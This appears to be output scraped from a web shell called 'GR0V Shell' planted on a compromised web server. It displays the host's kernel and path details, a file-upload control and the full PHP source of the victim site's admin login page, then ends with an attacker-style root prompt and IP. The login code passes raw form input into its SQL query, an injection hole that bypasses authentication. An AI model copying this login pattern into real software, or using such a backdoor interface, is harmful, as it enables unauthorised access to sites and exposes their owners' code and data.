? GR0V Shell

GR0V shell

Linux node1.dnscloudserver.in 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64

Path : /home/enviro777/public_html/admin/
File Upload :
Current File : /home/enviro777/public_html/admin/index.php

<?php ob_start();
session_start();
include "include/connection.php";
$obj = new db();
if($_POST)
{
extract($_POST);
 $sql="select * from admin where name='$login' and `password`='$password'";
 $run = $obj->query($sql);
 $num=$obj->count_row($sql);
if($num>0)
{
$_SESSION['admin']=$login;
header("location:home.php");
}
else{
$msg="Worng Username and Password";
}
}


?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Admin Panel</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<link type="text/css" rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<script language="javascript" src="javascript.js"></script>
</head>

<body id="body">

<table class="tbal"  >
<tr><td colspan="2" id="error">&nbsp;<?=@$msg?></td></tr>
<tr><td colspan="2" style="font-size:26px; color:#fff; font-weight:bold; font-family:Helvetica; text-align:center;" >Admin Login</td></tr>
<form name="loginform" action="index.php" method="post" onsubmit="return validation()">
<tr><td class="textboxcap"><i class="fa fa-user" aria-hidden="true"></i> Username&nbsp;</td><td><input type="text" name="login" value=""  class="inputboxp"/></td></tr>
<tr><td class="textboxcap"><i class="fa fa-key" aria-hidden="true"></i> Password&nbsp;</td><td><input type="password" name="password" value=""  class="inputboxp"/></td></tr>
<tr><td colspan="2" align="center"><input  type="submit"  value="Log in" name="submit"  class="submitbox "/></td></tr>
</form>
</table>


</body>
</html>

T1KUS90T
  root-grov@65.21.25.53:~$